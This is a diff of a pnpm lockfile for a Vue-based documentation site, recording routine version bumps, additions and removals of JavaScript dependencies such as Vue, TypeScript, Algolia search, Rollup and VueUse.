dependencies: + '@algolia/autocomplete-core': 1.17.7(@algolia/client-search@5.55.1)(algoliasearch@5.55.1)(search-insights@2.15.0) + '@algolia/autocomplete-preset-algolia': 1.17.7(@algolia/client-search@5.55.1)(algoliasearch@5.55.1) + '@docsearch/css': 3.8.2 + algoliasearch: 5.55.1 + optionalDependencies: + search-insights: 2.15.0 + transitivePeerDependencies: + - '@algolia/client-search' + + '@element-plus/icons-vue@2.3.2(vue@3.5.39(typescript@6.0.3))': + dependencies: + vue: 3.5.39(typescript@6.0.3) + + '@emnapi/core@1.11.1': + dependencies: + '@emnapi/wasi-threads': 1.2.2 + tslib: 2.8.1 + optional: true + + '@emnapi/runtime@1.11.1': + dependencies: + tslib: 2.8.1 + optional: true + + '@emnapi/wasi-threads@1.2.2': + dependencies: + tslib: 2.8.1 + optional: true + + '@esbuild/aix-ppc64@0.21.5': + optional: true + + '@esbuild/android-arm64@0.21.5': + optional: true + + '@esbuild/android-arm@0.21.5': + optional: true + + '@esbuild/android-x64@0.21.5': + optional: true + + '@esbuild/darwin-arm64@0.21.5': + optional: true + + '@esbuild/darwin-x64@0.21.5': + optional: true + + '@esbuild/freebsd-arm64@0.21.5': + optional: true + + '@esbuild/freebsd-x64@0.21.5': + optional: true + + '@esbuild/linux-arm64@0.21.5': + optional: true + + '@esbuild/linux-arm@0.21.5': + optional: true + + '@esbuild/linux-ia32@0.21.5': + optional: true + + '@esbuild/linux-loong64@0.21.5': + optional: true + + '@esbuild/linux-mips64el@0.21.5': + optional: true + + '@esbuild/linux-ppc64@0.21.5': + optional: true + + '@esbuild/linux-riscv64@0.21.5': + optional: true + + '@esbuild/linux-s390x@0.21.5': + optional: true + + '@esbuild/linux-x64@0.21.5': + optional: true + + '@esbuild/netbsd-x64@0.21.5': + optional: true + + '@esbuild/openbsd-x64@0.21.5': + optional: true + + '@esbuild/sunos-x64@0.21.5': + optional: true + + '@esbuild/win32-arm64@0.21.5': + optional: true + + '@esbuild/win32-ia32@0.21.5': + optional: true + + '@esbuild/win32-x64@0.21.5': + optional: true + + '@floating-ui/core@1.7.5': + dependencies: + '@floating-ui/utils': 0.2.11 + + '@floating-ui/dom@1.7.6': + dependencies: + '@floating-ui/core': 1.7.5 + '@floating-ui/utils': 0.2.11 + + '@floating-ui/utils@0.2.11': {} + + '@giscus/vue@3.1.1(vue@3.5.39(typescript@6.0.3))': + dependencies: + giscus: 1.6.0 + vue: 3.5.39(typescript@6.0.3) + + '@iconify-json/simple-icons@1.2.88': + dependencies: + '@iconify/types': 2.0.0 - '@algolia/client-personalization@5.47.0': - dependencies: - '@algolia/client-common': 5.47.0 - '@algolia/requester-browser-xhr': 5.47.0 - '@algolia/requester-fetch': 5.47.0 - '@algolia/requester-node-http': 5.47.0 + '@iconify/types@2.0.0': {} - '@algolia/client-query-suggestions@5.47.0': + '@jridgewell/gen-mapping@0.3.13': dependencies: - '@algolia/client-common': 5.47.0 - '@algolia/requester-browser-xhr': 5.47.0 - '@algolia/requester-fetch': 5.47.0 - '@algolia/requester-node-http': 5.47.0 + '@jridgewell/sourcemap-codec': 1.5.5 + '@jridgewell/trace-mapping': 0.3.31 - '@algolia/client-search@5.47.0': + '@jridgewell/remapping@2.3.5': dependencies: - '@algolia/client-common': 5.47.0 - '@algolia/requester-browser-xhr': 5.47.0 - '@algolia/requester-fetch': 5.47.0 - '@algolia/requester-node-http': 5.47.0 + '@jridgewell/gen-mapping': 0.3.13 + '@jridgewell/trace-mapping': 0.3.31 - '@algolia/ingestion@1.47.0': - dependencies: - '@algolia/client-common': 5.47.0 - '@algolia/requester-browser-xhr': 5.47.0 - '@algolia/requester-fetch': 5.47.0 - '@algolia/requester-node-http': 5.47.0 + '@jridgewell/resolve-uri@3.1.2': {} - '@algolia/monitoring@1.47.0': - dependencies: - '@algolia/client-common': 5.47.0 - '@algolia/requester-browser-xhr': 5.47.0 - '@algolia/requester-fetch': 5.47.0 - '@algolia/requester-node-http': 5.47.0 + '@jridgewell/sourcemap-codec@1.5.5': {} - '@algolia/recommend@5.47.0': + '@jridgewell/trace-mapping@0.3.31': dependencies: - '@algolia/client-common': 5.47.0 - '@algolia/requester-browser-xhr': 5.47.0 - '@algolia/requester-fetch': 5.47.0 - '@algolia/requester-node-http': 5.47.0 + '@jridgewell/resolve-uri': 3.1.2 + '@jridgewell/sourcemap-codec': 1.5.5 - '@algolia/requester-browser-xhr@5.47.0': - dependencies: - '@algolia/client-common': 5.47.0 + '@lit-labs/ssr-dom-shim@1.6.0': {} - '@algolia/requester-fetch@5.47.0': + '@lit/reactive-element@2.1.2': dependencies: - '@algolia/client-common': 5.47.0 + '@lit-labs/ssr-dom-shim': 1.6.0 - '@algolia/requester-node-http@5.47.0': + '@napi-rs/wasm-runtime@1.1.6(@emnapi/core@1.11.1)(@emnapi/runtime@1.11.1)': dependencies: - '@algolia/client-common': 5.47.0 - - '@babel/helper-string-parser@7.27.1': {} + '@emnapi/core': 1.11.1 + '@emnapi/runtime': 1.11.1 + '@tybys/wasm-util': 0.10.3 + optional: true - '@babel/helper-validator-identifier@7.28.5': {} + '@nuxt/kit@4.4.8': + dependencies: + c12: 3.3.4 + consola: 3.4.2 + defu: 6.1.7 + destr: 2.0.5 + errx: 0.1.0 + exsolve: 1.1.0 + ignore: 7.0.5 + jiti: 2.7.0 + klona: 2.0.6 + mlly: 1.8.2 + ohash: 2.0.11 + pathe: 2.0.3 + pkg-types: 2.3.1 + rc9: 3.0.1 + scule: 1.3.0 + semver: 7.8.5 + tinyglobby: 0.2.17 + ufo: 1.6.4 + unctx: 2.5.0 + untyped: 2.0.0 + transitivePeerDependencies: + - magicast - '@babel/parser@7.29.0': - dependencies: - '@babel/types': 7.29.0 + '@oxc-project/types@0.138.0': {} - '@babel/types@7.29.0': - dependencies: - '@babel/helper-string-parser': 7.27.1 - '@babel/helper-validator-identifier': 7.28.5 + '@parcel/watcher-android-arm64@2.5.6': + optional: true - '@biomejs/biome@1.9.4': - optionalDependencies: - '@biomejs/cli-darwin-arm64': 1.9.4 - '@biomejs/cli-darwin-x64': 1.9.4 - '@biomejs/cli-linux-arm64': 1.9.4 - '@biomejs/cli-linux-arm64-musl': 1.9.4 - '@biomejs/cli-linux-x64': 1.9.4 - '@biomejs/cli-linux-x64-musl': 1.9.4 - '@biomejs/cli-win32-arm64': 1.9.4 - '@biomejs/cli-win32-x64': 1.9.4 + '@parcel/watcher-darwin-arm64@2.5.6': + optional: true - '@biomejs/cli-darwin-arm64@1.9.4': + '@parcel/watcher-darwin-x64@2.5.6': optional: true - '@biomejs/cli-darwin-x64@1.9.4': + '@parcel/watcher-freebsd-x64@2.5.6': optional: true - '@biomejs/cli-linux-arm64-musl@1.9.4': + '@parcel/watcher-linux-arm-glibc@2.5.6': optional: true - '@biomejs/cli-linux-arm64@1.9.4': + '@parcel/watcher-linux-arm-musl@2.5.6': optional: true - '@biomejs/cli-linux-x64-musl@1.9.4': + '@parcel/watcher-linux-arm64-glibc@2.5.6': optional: true - '@biomejs/cli-linux-x64@1.9.4': + '@parcel/watcher-linux-arm64-musl@2.5.6': optional: true - '@biomejs/cli-win32-arm64@1.9.4': + '@parcel/watcher-linux-x64-glibc@2.5.6': optional: true - '@biomejs/cli-win32-x64@1.9.4': + '@parcel/watcher-linux-x64-musl@2.5.6': optional: true - '@ctrl/tinycolor@3.6.1': {} + '@parcel/watcher-win32-arm64@2.5.6': + optional: true - '@docsearch/css@3.8.2': {} + '@parcel/watcher-win32-ia32@2.5.6': + optional: true - '@docsearch/js@3.8.2(@algolia/client-search@5.47.0)(search-insights@2.15.0)': - dependencies: - '@docsearch/react': 3.8.2(@algolia/client-search@5.47.0)(search-insights@2.15.0) - preact: 10.28.2 - transitivePeerDependencies: - - '@algolia/client-search' - - '@types/react' - - react - - react-dom - - search-insights + '@parcel/watcher-win32-x64@2.5.6': + optional: true - '@docsearch/react@3.8.2(@algolia/client-search@5.47.0)(search-insights@2.15.0)': + '@parcel/watcher@2.5.6': dependencies: - '@algolia/autocomplete-core': 1.17.7(@algolia/client-search@5.47.0)(algoliasearch@5.47.0)(search-insights@2.15.0) - '@algolia/autocomplete-preset-algolia': 1.17.7(@algolia/client-search@5.47.0)(algoliasearch@5.47.0) - '@docsearch/css': 3.8.2 - algoliasearch: 5.47.0 + detect-libc: 2.1.2 + is-glob: 4.0.3 + node-addon-api: 7.1.1 + picomatch: 4.0.5 optionalDependencies: - search-insights: 2.15.0 - transitivePeerDependencies: - - '@algolia/client-search' - - '@element-plus/icons-vue@2.3.2(vue@3.5.29(typescript@5.9.3))': - dependencies: - vue: 3.5.29(typescript@5.9.3) - - '@esbuild/aix-ppc64@0.21.5': + '@parcel/watcher-android-arm64': 2.5.6 + '@parcel/watcher-darwin-arm64': 2.5.6 + '@parcel/watcher-darwin-x64': 2.5.6 + '@parcel/watcher-freebsd-x64': 2.5.6 + '@parcel/watcher-linux-arm-glibc': 2.5.6 + '@parcel/watcher-linux-arm-musl': 2.5.6 + '@parcel/watcher-linux-arm64-glibc': 2.5.6 + '@parcel/watcher-linux-arm64-musl': 2.5.6 + '@parcel/watcher-linux-x64-glibc': 2.5.6 + '@parcel/watcher-linux-x64-musl': 2.5.6 + '@parcel/watcher-win32-arm64': 2.5.6 + '@parcel/watcher-win32-ia32': 2.5.6 + '@parcel/watcher-win32-x64': 2.5.6 optional: true - '@esbuild/android-arm64@0.21.5': + '@rolldown/binding-android-arm64@1.1.4': optional: true - '@esbuild/android-arm@0.21.5': + '@rolldown/binding-darwin-arm64@1.1.4': optional: true - '@esbuild/android-x64@0.21.5': + '@rolldown/binding-darwin-x64@1.1.4': optional: true - '@esbuild/darwin-arm64@0.21.5': + '@rolldown/binding-freebsd-x64@1.1.4': optional: true - '@esbuild/darwin-x64@0.21.5': + '@rolldown/binding-linux-arm-gnueabihf@1.1.4': optional: true - '@esbuild/freebsd-arm64@0.21.5': + '@rolldown/binding-linux-arm64-gnu@1.1.4': optional: true - '@esbuild/freebsd-x64@0.21.5': + '@rolldown/binding-linux-arm64-musl@1.1.4': optional: true - '@esbuild/linux-arm64@0.21.5': + '@rolldown/binding-linux-ppc64-gnu@1.1.4': optional: true - '@esbuild/linux-arm@0.21.5': + '@rolldown/binding-linux-s390x-gnu@1.1.4': optional: true - '@esbuild/linux-ia32@0.21.5': + '@rolldown/binding-linux-x64-gnu@1.1.4': optional: true - '@esbuild/linux-loong64@0.21.5': + '@rolldown/binding-linux-x64-musl@1.1.4': optional: true - '@esbuild/linux-mips64el@0.21.5': + '@rolldown/binding-openharmony-arm64@1.1.4': optional: true - '@esbuild/linux-ppc64@0.21.5': + '@rolldown/binding-wasm32-wasi@1.1.4': + dependencies: + '@emnapi/core': 1.11.1 + '@emnapi/runtime': 1.11.1 + '@napi-rs/wasm-runtime': 1.1.6(@emnapi/core@1.11.1)(@emnapi/runtime@1.11.1) optional: true - '@esbuild/linux-riscv64@0.21.5': + '@rolldown/binding-win32-arm64-msvc@1.1.4': optional: true - '@esbuild/linux-s390x@0.21.5': + '@rolldown/binding-win32-x64-msvc@1.1.4': optional: true - '@esbuild/linux-x64@0.21.5': - optional: true + '@rolldown/pluginutils@1.0.1': {} - '@esbuild/netbsd-x64@0.21.5': + '@rollup/rollup-android-arm-eabi@4.62.2': optional: true - '@esbuild/openbsd-x64@0.21.5': + '@rollup/rollup-android-arm64@4.62.2': optional: true - '@esbuild/sunos-x64@0.21.5': + '@rollup/rollup-darwin-arm64@4.62.2': optional: true - '@esbuild/win32-arm64@0.21.5': + '@rollup/rollup-darwin-x64@4.62.2': optional: true - '@esbuild/win32-ia32@0.21.5': + '@rollup/rollup-freebsd-arm64@4.62.2': optional: true - '@esbuild/win32-x64@0.21.5': + '@rollup/rollup-freebsd-x64@4.62.2': optional: true - '@floating-ui/core@1.7.3': - dependencies: - '@floating-ui/utils': 0.2.10 - - '@floating-ui/dom@1.7.4': - dependencies: - '@floating-ui/core': 1.7.3 - '@floating-ui/utils': 0.2.10 - - '@floating-ui/utils@0.2.10': {} - - '@giscus/vue@3.1.1(vue@3.5.29(typescript@5.9.3))': - dependencies: - giscus: 1.6.0 - vue: 3.5.29(typescript@5.9.3) - - '@iconify-json/simple-icons@1.2.67': - dependencies: - '@iconify/types': 2.0.0 - - '@iconify/types@2.0.0': {} - - '@jridgewell/sourcemap-codec@1.5.5': {} - - '@lit-labs/ssr-dom-shim@1.5.1': {} - - '@lit/reactive-element@2.1.2': - dependencies: - '@lit-labs/ssr-dom-shim': 1.5.1 + '@rollup/rollup-linux-arm-gnueabihf@4.62.2': + optional: true - '@rollup/pluginutils@5.3.0(rollup@4.59.0)': - dependencies: - '@types/estree': 1.0.8 - estree-walker: 2.0.2 - picomatch: 4.0.3 - optionalDependencies: - rollup: 4.59.0 + '@rollup/rollup-linux-arm-musleabihf@4.62.2': + optional: true - '@rollup/rollup-android-arm-eabi@4.59.0': + '@rollup/rollup-linux-arm64-gnu@4.62.2': optional: true - '@rollup/rollup-android-arm64@4.59.0': + '@rollup/rollup-linux-arm64-musl@4.62.2': optional: true - '@rollup/rollup-darwin-arm64@4.59.0': + '@rollup/rollup-linux-loong64-gnu@4.62.2': optional: true - '@rollup/rollup-darwin-x64@4.59.0': + '@rollup/rollup-linux-loong64-musl@4.62.2': optional: true - '@rollup/rollup-freebsd-arm64@4.59.0': + '@rollup/rollup-linux-ppc64-gnu@4.62.2': optional: true - '@rollup/rollup-freebsd-x64@4.59.0': + '@rollup/rollup-linux-ppc64-musl@4.62.2': optional: true - '@rollup/rollup-linux-arm-gnueabihf@4.59.0': + '@rollup/rollup-linux-riscv64-gnu@4.62.2': optional: true - '@rollup/rollup-linux-arm-musleabihf@4.59.0': + '@rollup/rollup-linux-riscv64-musl@4.62.2': optional: true - '@rollup/rollup-linux-arm64-gnu@4.59.0': + '@rollup/rollup-linux-s390x-gnu@4.62.2': optional: true - '@rollup/rollup-linux-arm64-musl@4.59.0': + '@rollup/rollup-linux-x64-gnu@4.62.2': optional: true - '@rollup/rollup-linux-loong64-gnu@4.59.0': + '@rollup/rollup-linux-x64-musl@4.62.2': optional: true - '@rollup/rollup-linux-loong64-musl@4.59.0': + '@rollup/rollup-openbsd-x64@4.62.2': optional: true - '@rollup/rollup-linux-ppc64-gnu@4.59.0': + '@rollup/rollup-openharmony-arm64@4.62.2': optional: true - '@rollup/rollup-linux-ppc64-musl@4.59.0': + '@rollup/rollup-win32-arm64-msvc@4.62.2': optional: true - '@rollup/rollup-linux-riscv64-gnu@4.59.0': + '@rollup/rollup-win32-ia32-msvc@4.62.2': optional: true - '@rollup/rollup-linux-riscv64-musl@4.59.0': + '@rollup/rollup-win32-x64-gnu@4.62.2': optional: true - '@rollup/rollup-linux-s390x-gnu@4.59.0': + '@rollup/rollup-win32-x64-msvc@4.62.2': optional: true - '@rollup/rollup-linux-x64-gnu@4.59.0': + '@se-oss/deasync-darwin-arm64@1.0.1': optional: true - '@rollup/rollup-linux-x64-musl@4.59.0': + '@se-oss/deasync-darwin-x64@1.0.1': optional: true - '@rollup/rollup-openbsd-x64@4.59.0': + '@se-oss/deasync-linux-arm64-gnu@1.0.1': optional: true - '@rollup/rollup-openharmony-arm64@4.59.0': + '@se-oss/deasync-linux-arm64-musl@1.0.1': optional: true - '@rollup/rollup-win32-arm64-msvc@4.59.0': + '@se-oss/deasync-linux-x64-gnu@1.0.1': optional: true - '@rollup/rollup-win32-ia32-msvc@4.59.0': + '@se-oss/deasync-linux-x64-musl@1.0.1': optional: true - '@rollup/rollup-win32-x64-gnu@4.59.0': + '@se-oss/deasync-win32-arm64-msvc@1.0.1': optional: true - '@rollup/rollup-win32-x64-msvc@4.59.0': + '@se-oss/deasync-win32-x64-msvc@1.0.1': optional: true + '@se-oss/deasync@1.0.1': + dependencies: + type-fest: 4.41.0 + optionalDependencies: + '@se-oss/deasync-darwin-arm64': 1.0.1 + '@se-oss/deasync-darwin-x64': 1.0.1 + '@se-oss/deasync-linux-arm64-gnu': 1.0.1 + '@se-oss/deasync-linux-arm64-musl': 1.0.1 + '@se-oss/deasync-linux-x64-gnu': 1.0.1 + '@se-oss/deasync-linux-x64-musl': 1.0.1 + '@se-oss/deasync-win32-arm64-msvc': 1.0.1 + '@se-oss/deasync-win32-x64-msvc': 1.0.1 + '@shikijs/core@2.5.0': dependencies: '@shikijs/engine-javascript': 2.5.0 @@ -1860,11 +2454,16 @@ snapshots: '@sxzz/popperjs-es@2.11.8': {} - '@types/bun@1.3.10': + '@tybys/wasm-util@0.10.3': + dependencies: + tslib: 2.8.1 + optional: true + + '@types/bun@1.3.14': dependencies: - bun-types: 1.3.10 + bun-types: 1.3.14 - '@types/estree@1.0.8': {} + '@types/estree@1.0.9': {} '@types/hast@3.0.4': dependencies: @@ -1874,9 +2473,9 @@ snapshots: '@types/lodash-es@4.17.12': dependencies: - '@types/lodash': 4.17.23 + '@types/lodash': 4.17.24 - '@types/lodash@4.17.23': {} + '@types/lodash@4.17.24': {} '@types/markdown-it@14.1.2': dependencies: @@ -1889,79 +2488,72 @@ snapshots: '@types/mdurl@2.0.0': {} - '@types/node@22.19.13': + '@types/node@26.1.0': dependencies: - undici-types: 6.21.0 + undici-types: 8.3.0 '@types/trusted-types@2.0.7': {} '@types/unist@3.0.3': {} - '@types/web-bluetooth@0.0.20': {} - '@types/web-bluetooth@0.0.21': {} - '@ungap/structured-clone@1.3.0': {} + '@ungap/structured-clone@1.3.2': {} - '@vitejs/plugin-vue@5.2.4(vite@5.4.21(@types/node@22.19.13)(sass@1.76.0))(vue@3.5.29(typescript@5.9.3))': + '@vitejs/plugin-vue@5.2.4(vite@5.4.21(@types/node@26.1.0)(lightningcss@1.32.0)(sass@1.101.0))(vue@3.5.39(typescript@6.0.3))': dependencies: - vite: 5.4.21(@types/node@22.19.13)(sass@1.76.0) - vue: 3.5.29(typescript@5.9.3) + vite: 5.4.21(@types/node@26.1.0)(lightningcss@1.32.0)(sass@1.101.0) + vue: 3.5.39(typescript@6.0.3) - '@volar/language-core@2.4.15': + '@volar/language-core@2.4.28': dependencies: - '@volar/source-map': 2.4.15 + '@volar/source-map': 2.4.28 - '@volar/source-map@2.4.15': {} + '@volar/source-map@2.4.28': {} - '@volar/typescript@2.4.15': + '@volar/typescript@2.4.28': dependencies: - '@volar/language-core': 2.4.15 + '@volar/language-core': 2.4.28 path-browserify: 1.0.1 vscode-uri: 3.1.0 - '@vue/compiler-core@3.5.29': + '@vue/compiler-core@3.5.39': dependencies: - '@babel/parser': 7.29.0 - '@vue/shared': 3.5.29 + '@babel/parser': 7.29.7 + '@vue/shared': 3.5.39 entities: 7.0.1 estree-walker: 2.0.2 source-map-js: 1.2.1 - '@vue/compiler-dom@3.5.29': + '@vue/compiler-dom@3.5.39': dependencies: - '@vue/compiler-core': 3.5.29 - '@vue/shared': 3.5.29 + '@vue/compiler-core': 3.5.39 + '@vue/shared': 3.5.39 - '@vue/compiler-sfc@3.5.29': + '@vue/compiler-sfc@3.5.39': dependencies: - '@babel/parser': 7.29.0 - '@vue/compiler-core': 3.5.29 - '@vue/compiler-dom': 3.5.29 - '@vue/compiler-ssr': 3.5.29 - '@vue/shared': 3.5.29 + '@babel/parser': 7.29.7 + '@vue/compiler-core': 3.5.39 + '@vue/compiler-dom': 3.5.39 + '@vue/compiler-ssr': 3.5.39 + '@vue/shared': 3.5.39 estree-walker: 2.0.2 magic-string: 0.30.21 - postcss: 8.5.6 + postcss: 8.5.16 source-map-js: 1.2.1 - '@vue/compiler-ssr@3.5.29': + '@vue/compiler-ssr@3.5.39': dependencies: - '@vue/compiler-dom': 3.5.29 - '@vue/shared': 3.5.29 + '@vue/compiler-dom': 3.5.39 + '@vue/shared': 3.5.39 - '@vue/compiler-vue2@2.7.16': + '@vue/devtools-api@7.7.10': dependencies: - de-indent: 1.0.2 - he: 1.2.0 + '@vue/devtools-kit': 7.7.10 - '@vue/devtools-api@7.7.9': + '@vue/devtools-kit@7.7.10': dependencies: - '@vue/devtools-kit': 7.7.9 - - '@vue/devtools-kit@7.7.9': - dependencies: - '@vue/devtools-shared': 7.7.9 + '@vue/devtools-shared': 7.7.10 birpc: 2.9.0 hookable: 5.5.3 mitt: 3.0.1 @@ -1969,144 +2561,110 @@ snapshots: speakingurl: 14.0.1 superjson: 2.2.6 - '@vue/devtools-shared@7.7.9': + '@vue/devtools-shared@7.7.10': dependencies: rfdc: 1.4.1 - '@vue/language-core@2.2.12(typescript@5.9.3)': + '@vue/language-core@3.3.6': dependencies: - '@volar/language-core': 2.4.15 - '@vue/compiler-dom': 3.5.29 - '@vue/compiler-vue2': 2.7.16 - '@vue/shared': 3.5.29 - alien-signals: 1.0.13 - minimatch: 9.0.7 + '@volar/language-core': 2.4.28 + '@vue/compiler-dom': 3.5.39 + '@vue/shared': 3.5.39 + alien-signals: 3.2.1 muggle-string: 0.4.1 path-browserify: 1.0.1 - optionalDependencies: - typescript: 5.9.3 + picomatch: 4.0.5 - '@vue/reactivity@3.5.29': + '@vue/reactivity@3.5.39': dependencies: - '@vue/shared': 3.5.29 + '@vue/shared': 3.5.39 - '@vue/runtime-core@3.5.29': + '@vue/runtime-core@3.5.39': dependencies: - '@vue/reactivity': 3.5.29 - '@vue/shared': 3.5.29 + '@vue/reactivity': 3.5.39 + '@vue/shared': 3.5.39 - '@vue/runtime-dom@3.5.29': + '@vue/runtime-dom@3.5.39': dependencies: - '@vue/reactivity': 3.5.29 - '@vue/runtime-core': 3.5.29 - '@vue/shared': 3.5.29 + '@vue/reactivity': 3.5.39 + '@vue/runtime-core': 3.5.39 + '@vue/shared': 3.5.39 csstype: 3.2.3 - '@vue/server-renderer@3.5.29(vue@3.5.29(typescript@5.9.3))': - dependencies: - '@vue/compiler-ssr': 3.5.29 - '@vue/shared': 3.5.29 - vue: 3.5.29(typescript@5.9.3) - - '@vue/shared@3.5.27': {} - - '@vue/shared@3.5.29': {} - - '@vueuse/core@10.11.1(vue@3.5.29(typescript@5.9.3))': + '@vue/server-renderer@3.5.39(vue@3.5.39(typescript@6.0.3))': dependencies: - '@types/web-bluetooth': 0.0.20 - '@vueuse/metadata': 10.11.1 - '@vueuse/shared': 10.11.1(vue@3.5.29(typescript@5.9.3)) - vue-demi: 0.14.10(vue@3.5.29(typescript@5.9.3)) - transitivePeerDependencies: - - '@vue/composition-api' - - vue + '@vue/compiler-ssr': 3.5.39 + '@vue/shared': 3.5.39 + vue: 3.5.39(typescript@6.0.3) - '@vueuse/core@11.3.0(vue@3.5.29(typescript@5.9.3))': - dependencies: - '@types/web-bluetooth': 0.0.20 - '@vueuse/metadata': 11.3.0 - '@vueuse/shared': 11.3.0(vue@3.5.29(typescript@5.9.3)) - vue-demi: 0.14.10(vue@3.5.29(typescript@5.9.3)) - transitivePeerDependencies: - - '@vue/composition-api' - - vue + '@vue/shared@3.5.39': {} - '@vueuse/core@12.8.2(typescript@5.9.3)': + '@vueuse/core@12.8.2(typescript@6.0.3)': dependencies: '@types/web-bluetooth': 0.0.21 '@vueuse/metadata': 12.8.2 - '@vueuse/shared': 12.8.2(typescript@5.9.3) - vue: 3.5.29(typescript@5.9.3) + '@vueuse/shared': 12.8.2(typescript@6.0.3) + vue: 3.5.39(typescript@6.0.3) transitivePeerDependencies: - typescript - '@vueuse/integrations@12.8.2(async-validator@4.2.5)(focus-trap@7.8.0)(typescript@5.9.3)': + '@vueuse/core@14.3.0(vue@3.5.39(typescript@6.0.3))': + dependencies: + '@types/web-bluetooth': 0.0.21 + '@vueuse/metadata': 14.3.0 + '@vueuse/shared': 14.3.0(vue@3.5.39(typescript@6.0.3)) + vue: 3.5.39(typescript@6.0.3) + + '@vueuse/integrations@12.8.2(async-validator@4.2.5)(focus-trap@7.8.0)(typescript@6.0.3)': dependencies: - '@vueuse/core': 12.8.2(typescript@5.9.3) - '@vueuse/shared': 12.8.2(typescript@5.9.3) - vue: 3.5.29(typescript@5.9.3) + '@vueuse/core': 12.8.2(typescript@6.0.3) + '@vueuse/shared': 12.8.2(typescript@6.0.3) + vue: 3.5.39(typescript@6.0.3) optionalDependencies: async-validator: 4.2.5 focus-trap: 7.8.0 transitivePeerDependencies: - typescript - '@vueuse/metadata@10.11.1': {} - - '@vueuse/metadata@11.3.0': {} - '@vueuse/metadata@12.8.2': {} - '@vueuse/shared@10.11.1(vue@3.5.29(typescript@5.9.3))': - dependencies: - vue-demi: 0.14.10(vue@3.5.29(typescript@5.9.3)) - transitivePeerDependencies: - - '@vue/composition-api' - - vue - - '@vueuse/shared@11.3.0(vue@3.5.29(typescript@5.9.3))': - dependencies: - vue-demi: 0.14.10(vue@3.5.29(typescript@5.9.3)) - transitivePeerDependencies: - - '@vue/composition-api' - - vue + '@vueuse/metadata@14.3.0': {} - '@vueuse/shared@12.8.2(typescript@5.9.3)': + '@vueuse/shared@12.8.2(typescript@6.0.3)': dependencies: - vue: 3.5.29(typescript@5.9.3) + vue: 3.5.39(typescript@6.0.3) transitivePeerDependencies: - typescript - '@xmldom/xmldom@0.9.8': {} + '@vueuse/shared@14.3.0(vue@3.5.39(typescript@6.0.3))': + dependencies: + vue: 3.5.39(typescript@6.0.3) - acorn@8.15.0: {} + acorn@8.17.0: {} - algoliasearch@5.47.0: + algoliasearch@5.55.1: dependencies: - '@algolia/abtesting': 1.13.0 - '@algolia/client-abtesting': 5.47.0 - '@algolia/client-analytics': 5.47.0 - '@algolia/client-common': 5.47.0 - '@algolia/client-insights': 5.47.0 - '@algolia/client-personalization': 5.47.0 - '@algolia/client-query-suggestions': 5.47.0 - '@algolia/client-search': 5.47.0 - '@algolia/ingestion': 1.47.0 - '@algolia/monitoring': 1.47.0 - '@algolia/recommend': 5.47.0 - '@algolia/requester-browser-xhr': 5.47.0 - '@algolia/requester-fetch': 5.47.0 - '@algolia/requester-node-http': 5.47.0 - - alien-signals@1.0.13: {} + '@algolia/abtesting': 1.21.1 + '@algolia/client-abtesting': 5.55.1 + '@algolia/client-analytics': 5.55.1 + '@algolia/client-common': 5.55.1 + '@algolia/client-insights': 5.55.1 + '@algolia/client-personalization': 5.55.1 + '@algolia/client-query-suggestions': 5.55.1 + '@algolia/client-search': 5.55.1 + '@algolia/ingestion': 1.55.1 + '@algolia/monitoring': 1.55.1 + '@algolia/recommend': 5.55.1 + '@algolia/requester-browser-xhr': 5.55.1 + '@algolia/requester-fetch': 5.55.1 + '@algolia/requester-node-http': 5.55.1 - ansi-colors@4.1.3: {} + alien-signals@3.2.1: {} anymatch@3.1.3: dependencies: normalize-path: 3.0.0 - picomatch: 2.3.1 + picomatch: 2.3.2 async-validator@4.2.5: {} @@ -2118,7 +2676,7 @@ snapshots: boolbase@1.0.0: {} - brace-expansion@5.0.3: + brace-expansion@5.0.7: dependencies: balanced-match: 4.0.4 @@ -2126,9 +2684,24 @@ snapshots: dependencies: fill-range: 7.1.1 - bun-types@1.3.10: + bun-types@1.3.14: + dependencies: + '@types/node': 26.1.0 + + c12@3.3.4: dependencies: - '@types/node': 22.19.13 + chokidar: 5.0.0 + confbox: 0.2.4 + defu: 6.1.7 + dotenv: 17.4.2 + exsolve: 1.1.0 + giget: 3.3.0 + jiti: 2.7.0 + ohash: 2.0.11 + pathe: 2.0.3 + perfect-debounce: 2.1.0 + pkg-types: 2.3.1 + rc9: 3.0.1 ccount@2.0.1: {} @@ -2136,24 +2709,6 @@ snapshots: character-entities-legacy@3.0.0: {} - cheerio-select@1.6.0: - dependencies: - css-select: 4.3.0 - css-what: 6.2.2 - domelementtype: 2.3.0 - domhandler: 4.3.1 - domutils: 2.8.0 - - cheerio@1.0.0-rc.10: - dependencies: - cheerio-select: 1.6.0 - dom-serializer: 1.4.1 - domhandler: 4.3.1 - htmlparser2: 6.1.0 - parse5: 6.0.1 - parse5-htmlparser2-tree-adapter: 6.0.1 - tslib: 2.8.1 - chokidar@3.6.0: dependencies: anymatch: 3.1.3 @@ -2166,26 +2721,28 @@ snapshots: optionalDependencies: fsevents: 2.3.3 - comma-separated-tokens@2.0.3: {} + chokidar@5.0.0: + dependencies: + readdirp: 5.0.0 - commander@13.1.0: {} + citty@0.1.6: + dependencies: + consola: 3.4.2 - commander@6.2.1: {} + comma-separated-tokens@2.0.3: {} commander@7.2.0: {} + confbox@0.1.8: {} + + confbox@0.2.4: {} + + consola@3.4.2: {} + copy-anything@4.0.5: dependencies: is-what: 5.5.0 - css-select@4.3.0: - dependencies: - boolbase: 1.0.0 - css-what: 6.2.2 - domhandler: 4.3.1 - domutils: 2.8.0 - nth-check: 2.1.1 - css-select@5.2.2: dependencies: boolbase: 1.0.0 @@ -2212,9 +2769,7 @@ snapshots: csstype@3.2.3: {} - dayjs@1.11.19: {} - - de-indent@1.0.2: {} + dayjs@1.11.21: {} debug@4.4.3(supports-color@5.5.0): dependencies: @@ -2222,18 +2777,18 @@ snapshots: optionalDependencies: supports-color: 5.5.0 + defu@6.1.7: {} + dequal@2.0.3: {} + destr@2.0.5: {} + + detect-libc@2.1.2: {} + devlop@1.1.0: dependencies: dequal: 2.0.3 - dom-serializer@1.4.1: - dependencies: - domelementtype: 2.3.0 - domhandler: 4.3.1 - entities: 2.2.0 - dom-serializer@2.0.0: dependencies: domelementtype: 2.3.0 @@ -2242,59 +2797,46 @@ snapshots: domelementtype@2.3.0: {} - domhandler@3.3.0: - dependencies: - domelementtype: 2.3.0 - - domhandler@4.3.1: - dependencies: - domelementtype: 2.3.0 - domhandler@5.0.3: dependencies: domelementtype: 2.3.0 - domutils@2.8.0: - dependencies: - dom-serializer: 1.4.1 - domelementtype: 2.3.0 - domhandler: 4.3.1 - domutils@3.2.2: dependencies: dom-serializer: 2.0.0 domelementtype: 2.3.0 domhandler: 5.0.3 - 